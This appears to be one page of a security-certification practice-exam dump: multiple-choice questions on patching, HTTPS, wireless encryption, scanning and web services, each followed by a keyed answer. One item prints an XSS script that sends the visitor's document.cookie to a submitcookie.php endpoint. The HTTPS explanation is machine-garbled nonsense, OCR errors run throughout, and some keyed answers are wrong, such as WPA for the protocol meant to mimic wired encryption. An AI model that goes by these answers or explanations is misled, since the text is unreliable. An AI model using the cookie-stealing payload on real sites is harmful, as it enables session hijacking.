A post-breach forensic investigation revealed that a known vulnerability in Apache Struts
was to blame for the Equifax data breach that affected 143 million customers. A fix was
available from the software vendor for several months prior 10 the Intrusion. This Is likely a
failure in which of the following security processes?
A.
vendor risk management
B.
Security awareness training
C.
Secure deployment lifecycle
D.
Patch management
Patch management
Bella, a security professional working at an it firm, finds that a security breach has occurred
while transferring important files. Sensitive data, employee usernames. and passwords are
shared In plaintext, paving the way for hackers 10 perform successful session hijacking. To
address this situation. Bella Implemented a protocol that sends data using encryption and
digital certificates. Which of the following protocols Is used by Bella?
A.
FTP
B.
HTTPS
C.
FTPS
D.
IP
HTTPS
Explanation:
HTTPS is the shortening for hypertext move convention secure, or secure hypertext move
convention in the event that you are not a fanatic for semantics.
How Does HTTPS Work?Dissimilar to HTTP, HTTPS utilizes a protected testament from
an outsider seller to make sure about an association and confirm that the site is genuine.
This safe authentication is known as a SSL Certificate (or “cert”).
SSL is a truncation for “secure attachments layer”. This is the thing that makes a safe,
encoded association between a program and a worker, which secures the layer of
correspondence between the two.
This declaration encodes an association with a degree of insurance that is assigned at your
season of the acquisition of a SSL endorsement.
A SSL endorsement gives an additional layer of security for touchy information that you
don’t need outsider aggressors to get to. This extra security can be critical with regards to
running online business sites.
A few Examples:
When you need to make sure about the transmission of Mastercard information or
other delicate data, (for example, somebody’s genuine location and actual
personality).
When you run a lead age site that depends on somebody’s genuine data, wherein
case you need to utilize HTTPS to protect against malevolent assaults on the
client’s information.
Which of the following tools can be used for passive OS fingerprinting?
A.
nmap
B.
tcpdump
C.
tracert
D.
ping
tcpdump
There have been concerns in your network that the wireless network component is not
sufficiently secure. You perform a vulnerability scan of the wireless network and find that it
is using an old encryption protocol that was designed to mimic wired encryption, what
encryption protocol is being used?
A.
WEP
B.
RADIUS
C.
WPA
D.
WPA3
WPA
Wi-Fi Protected Access (WPA), Wi-Fi Protected Access II (WPA2), and Wi-Fi Protected
Access 3 (WPA3) are the three security and security certification programs developed by
the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in
response to serious weaknesses researchers had found within the previous system, Wired
Equivalent Privacy (WEP).WPA (sometimes mentioned because the draft IEEE 802.11i
standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate
measure in anticipation of the supply of the safer and sophisticated WPA2, which became
available in 2004 and may be a common shorthand for the complete IEEE 802.11i (or IEEE
802.11i-2004) standard.In January 2018, Wi-Fi Alliance announced the discharge of WPA3
with several security improvements over WPA2.The Wi-Fi Alliance intended WPA as an
intermediate measure to require the place of WEP pending the supply of the complete
IEEE 802.11i standard. WPA might be implemented through firmware upgrades on
wireless network interface cards designed for WEP that began shipping as far back as
1999. However, since the changes required within the wireless access points (APs) were
more extensive than those needed on the network cards, most pre-2003 APs couldn’t be
upgraded to support WPA.The WPA protocol implements much of the IEEE 802.11i
standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA.
WEP used a 64-bit or 128-bit encryption key that has got to be manually entered on
wireless access points and devices and doesn’t change. TKIP employs a per-packet key,
meaning that it dynamically generates a replacement 128-bit key for every packet and thus
prevents the kinds of attacks that compromised WEP.WPA also includes a Message
Integrity Check, which is meant to stop an attacker from altering and resending data
packets. This replaces the cyclic redundancy check (CRC) that was employed by the WEP
standard. CRC’s main flaw was that it didn’t provide a sufficiently strong data integrity
guarantee for the packets it handled. Well-tested message authentication codes existed to
unravel these problems, but they required an excessive amount of computation to be used
on old network cards. WPA uses a message integrity check algorithm called TKIP to verify
the integrity of the packets. TKIP is far stronger than a CRC, but not as strong because the
algorithm utilized in WPA2. Researchers have since discovered a flaw in WPA that relied
on older weaknesses in WEP and therefore the limitations of the message integrity code
hash function, named Michael, to retrieve the keystream from short packets to use for reinjection
and spoofing
Vlady works in a fishing company where the majority of the employees have very little
understanding of IT let alone IT Security. Several information security issues that Vlady
often found includes, employees sharing password, writing his/her password on a post it
note and stick it to his/her desk, leaving the computer unlocked, didn’t log out from emails
or other social media accounts, and etc.
After discussing with his boss, Vlady decided to make some changes to improve the
security environment in his company. The first thing that Vlady wanted to do is to make the
employees understand the importance of keeping confidential information, such as
password, a secret and they should not share it with other persons.
Which of the following steps should be the first thing that Vlady should do to make the
employees in his company understand to importance of keeping confidential information a
secret?
A.
Warning to those who write password on a post it note and put it on his/her desk
B.
Developing a strict information security policy
C.
Information security awareness training
D.
Conducting a one to one discussion with the other employees about the importance of information security
Warning to those who write password on a post it note and put it on his/her desk
Why should the security analyst disable/remove unnecessary ISAPI filters?
A.
To defend against social engineering attacks
B.
To defend against webserver attacks
C.
To defend against jailbreaking
D.
To defend against wireless attacks
To defend against webserver attacks
Judy created a forum, one day. she discovers that a user is posting strange images without
writing comments.
She immediately calls a security expert, who discovers that the following code is hidden
behind those images:
<script>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+
escape(document.cookie)+ " />); </script>
What issue occurred for the users who clicked on the image?
A.
The code inject a new cookie to the browser.
B.
The code redirects the user to another site.
C.
The code is a virus that is attempting to gather the users username and password.
D.
This php file silently executes the code and grabs the users session cookie and session
ID.
This php file silently executes the code and grabs the users session cookie and session
ID.
Gilbert, a web developer, uses a centralized web API to reduce complexity and increase
the Integrity of updating and changing data. For this purpose, he uses a web service that
uses HTTP methods such as PUT. POST. GET. and DELETE and can improve the overall
performance, visibility, scalability, reliability, and portability of an application. What is the
type of web-service API mentioned in the above scenario?
A.
JSON-RPC
B.
SOAP API
C.
RESTful API
D.
REST API
REST API
What is the proper response for a NULL scan if the port is open?
A.
SYN
B.
ACK
C.
FIN
D.
PSH
E.
RST
F.
No response
No response
Why containers are less secure that virtual machines?
A.
Host OS on containers has a larger surface attack.
B.
Containers may full fill disk space of the host.
C.
A compromise container may cause a CPU starvation of the host.
D.
Containers are attached to the same virtual network.
Host OS on containers has a larger surface attack.
An organization is performing a vulnerability assessment tor mitigating threats. James, a
pen tester, scanned the organization by building an inventory of the protocols found on the
organization's machines to detect which ports are attached to services such as an email
server, a web server or a database server. After identifying the services, he selected the
vulnerabilities on each machine and started executing only the relevant tests. What is the
type of vulnerability assessment solution that James employed in the above scenario?
A.
Product-based solutions
B.
Tree-based assessment
C.
Service-based solutions
D.
inference-based assessment
Service-based solutions
PGP, SSL, and IKE are all examples of which type of cryptography?
A.
Digest
B.
Secret Key
C.
Public Key
D.
Hash Algorithm
Public Key
| Page 2 out of 44 Pages |
| Previous |